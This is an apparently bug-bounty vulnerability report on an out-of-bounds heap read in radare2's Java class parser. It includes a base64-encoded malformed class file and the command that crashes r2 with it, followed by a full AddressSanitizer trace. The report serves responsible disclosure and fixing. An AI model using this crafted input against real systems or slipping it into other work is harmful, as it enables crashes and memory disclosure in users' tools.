Out-of-bounds Read in r_bin_java_bootstrap_methods_attr_new function in radareorg/radare2
Valid
Reported on
Apr 23rd 2022
- Description
Out-of-bounds (OOB) read vulnerability exists in r_bin_java_bootstrap_methods_attr_new function in Radare2 5.6.9.
This is similar with CVE-2022-0518 and CVE-2022-0521.
- Version
radare2 5.6.9 27745 @ linux-x86-64 git.conti
commit: 14189710859c27981adb4c2c2aed2863c1859ec5 build: 2022-04-23__11:05:49
- Proof of Concept
# build the radare2 with address sanitizer
./sys/sanitize.sh
echo yv66vgAAADQADQcACwcADAEADnZpcnR1YWxEYWNoaW5lAQAeKAdMY29tL3N1bi9qZGkvVmlydHVhbE1hY2hpbmU7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAAtNaXJyb3IuamF2YQEAEEJvb3RzdHJhcE1ldGhvZHMBABdGb3VuZF9ieV9naXRodWIvYmV0NGl0OwEAEmNv7S9zdW4vamRpL01pcnJvAQEAEGphdmEvbGFuZy9PYmplY3QGBQABAAIAAAAAAAIEAQADAAQAAAQBEgUABgAAAAIABwAAAAIACAAJAAAAAA== | base64 -d > bootstrap.class
ASAN_OPTIONS=detect_leaks=0:detect_odr_violation=0 r2 -A bootstrap.class
- ASAN
=================================================================
==608400==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000063cb7 at pc 0x7f5fffc53f0c bp 0x7fff215606c0 sp 0x7fff215606b0
READ of size 1 at 0x602000063cb7 thread T0
#0 0x7f5fffc53f0b in r_bin_java_bootstrap_methods_attr_new /src/radare2/shlr/java/class.c:6934
#1 0x7f5fffc04919 in r_bin_java_read_next_attr_from_buffer /src/radare2/shlr/java/class.c:2082
#2 0x7f5fffc041e5 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2043
#3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
#17 0x7f6003e1a3c0 in __libc_start_main@GLIBC_2.2.5 (/usr/lib/libc.so.6+0x2d3c0)
#18 0x559df515e1a4 in _start (/src/radare2/binr/radare2/radare2+0x21a4)
0x602000063cb7 is located 0 bytes to the right of 7-byte region [0x602000063cb0,0x602000063cb7)
allocated by thread T0 here:
#0 0x7f6005bb5fb9 in __interceptor_calloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:154
#1 0x7f5fffc026a9 in r_bin_java_get_attr_buf /src/radare2/shlr/java/class.c:1963
#2 0x7f5fffc041a6 in r_bin_java_read_next_attr /src/radare2/shlr/java/class.c:2039
#3 0x7f5fffc0816c in r_bin_java_parse_attrs /src/radare2/shlr/java/class.c:2247
#4 0x7f5fffc0a25e in r_bin_java_load_bin /src/radare2/shlr/java/class.c:2373
#5 0x7f5fffc099f2 in r_bin_java_new_bin /src/radare2/shlr/java/class.c:2323
#6 0x7f5fffc16be8 in r_bin_java_new_buf /src/radare2/shlr/java/class.c:3145
#7 0x7f5ff974a8d4 in load_buffer /src/radare2/libr/..//libr/bin/p/bin_java.c:81
#8 0x7f5ff9580989 in r_bin_object_new /src/radare2/libr/bin/bobj.c:149
#9 0x7f5ff95751c7 in r_bin_file_new_from_buffer /src/radare2/libr/bin/bfile.c:585
#10 0x7f5ff95301ca in r_bin_open_buf /src/radare2/libr/bin/bin.c:281
#11 0x7f5ff9531060 in r_bin_open_io /src/radare2/libr/bin/bin.c:341
#12 0x7f5ffba2dedd in r_core_file_do_load_for_io_plugin /src/radare2/libr/core/cfile.c:436
#13 0x7f5ffba30c1e in r_core_bin_load /src/radare2/libr/core/cfile.c:637
#14 0x7f6004a2fc10 in r_main_radare2 /src/radare2/libr/main/radare2.c:1206
#15 0x559df515e81b in main /src/radare2/binr/radare2/radare2.c:96
#16 0x7f6003e1a30f in __libc_start_call_main (/usr/lib/libc.so.6+0x2d30f)
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/radare2/shlr/java/class.c:6934 in r_bin_java_bootstrap_methods_attr_new
Shadow bytes around the buggy address:
0x0c0480004740: fa fa fd fa fa fa fd fa fa fa 05 fa fa fa 00 07
0x0c0480004750: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 01
0x0c0480004760: fa fa 05 fa fa fa fd fd fa fa 05 fa fa fa 00 03
0x0c0480004770: fa fa fd fd fa fa 05 fa fa fa 00 04 fa fa 05 fa
0x0c0480004780: fa fa 05 fa fa fa 05 fa fa fa 05 fa fa fa 05 fa
=>0x0c0480004790: fa fa fd fd fa fa[07]fa fa fa fa fa fa fa fa fa
0x0c04800047a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c04800047e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==608400==ABORTING
Impact
The bug causes the program reads data past the end 2f the intented buffer. Typically, this can allow attackers to read sensitive information from other memory locations or cause a crash. More details see CWE-125: Out-of-bounds read.
References
We are processing your report and will contact the
radareorg/radare2
team within 24 hours.
2 years ago
Bet4 modified the report
2 years ago
Bet4 modified the report
2 years ago
We have contacted a member of the
radareorg/radare2
team and are waiting to hear back
2 years ago
The researcher's credibility has increased: +7
to join this conversation